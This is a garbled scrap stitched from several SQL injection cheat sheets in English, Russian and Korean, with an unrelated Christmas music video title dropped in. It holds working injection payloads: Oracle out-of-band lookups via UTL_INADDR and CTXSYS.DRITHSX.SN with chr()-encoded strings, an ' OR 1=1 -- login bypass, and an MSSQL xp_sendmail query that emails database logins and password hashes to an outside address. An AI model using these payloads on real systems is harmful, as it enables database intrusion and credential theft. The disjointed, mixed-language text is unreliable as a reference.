SQL> SELECT UTL_INADDR.get_host_address from dual
...utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual.
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(113)||chr(120)
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(100)||chr(114)||chr(118)||chr(54)||chr(119)||chr(120)||chr(116)||chr(103)||chr(117)||chr(121)||chr(120)||chr(110)||chr(49)|.
23. SQL-инъекция в LIMIT (M) запросах Пример: SELECT id, product FROM test.test LIMIT 0,0
Чтобы использовать этот метод, пользователи должны иметь доступ utl_http к сети.
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = ''; ( 3 ) 버전 테스팅. SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
Christmas Ambience with Instrumental Christmas Music and Crackling Fireplace 24/7 - Christmas
select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'[email protected]', @query = N'select user, password from sys.syslogins where password is not null' ; • Unless you get really lucky to be injected into PL/SQL.